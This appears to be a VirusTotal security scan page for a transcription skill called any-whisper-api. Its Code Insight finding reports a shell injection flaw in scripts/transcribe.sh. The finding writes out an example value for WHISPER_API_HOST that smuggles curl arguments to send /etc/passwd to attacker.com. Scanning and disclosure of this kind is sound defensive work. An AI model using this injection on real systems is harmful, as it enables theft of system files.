Skill v1.3.0

VirusTotal security

ANY WHISPER API · External malware reputation and Code Insight signals for this exact artifact hash.

Scanner verdict

Review
Apr 30, 2026, 4:33 AM
Hash
5803362defbbc5d992d75d43bcffd065c5bdcf60781b9d489fe05c1bb3b0dddc
Source
palm
Verdict
suspicious
Code Insight
Type: OpenClaw Skill
Name: any-whisper-api
Version: 1.3.0

The `scripts/transcribe.sh` file contains a shell injection vulnerability. The `WHISPER_API_HOST` environment variable is directly interpolated into the `curl` command without proper quoting or sanitization. An attacker who can control this environment variable could inject arbitrary `curl` arguments, potentially leading to data exfiltration (e.g., `WHISPER_API_HOST="attacker.com --data-binary @/etc/passwd"`) or other unauthorized actions.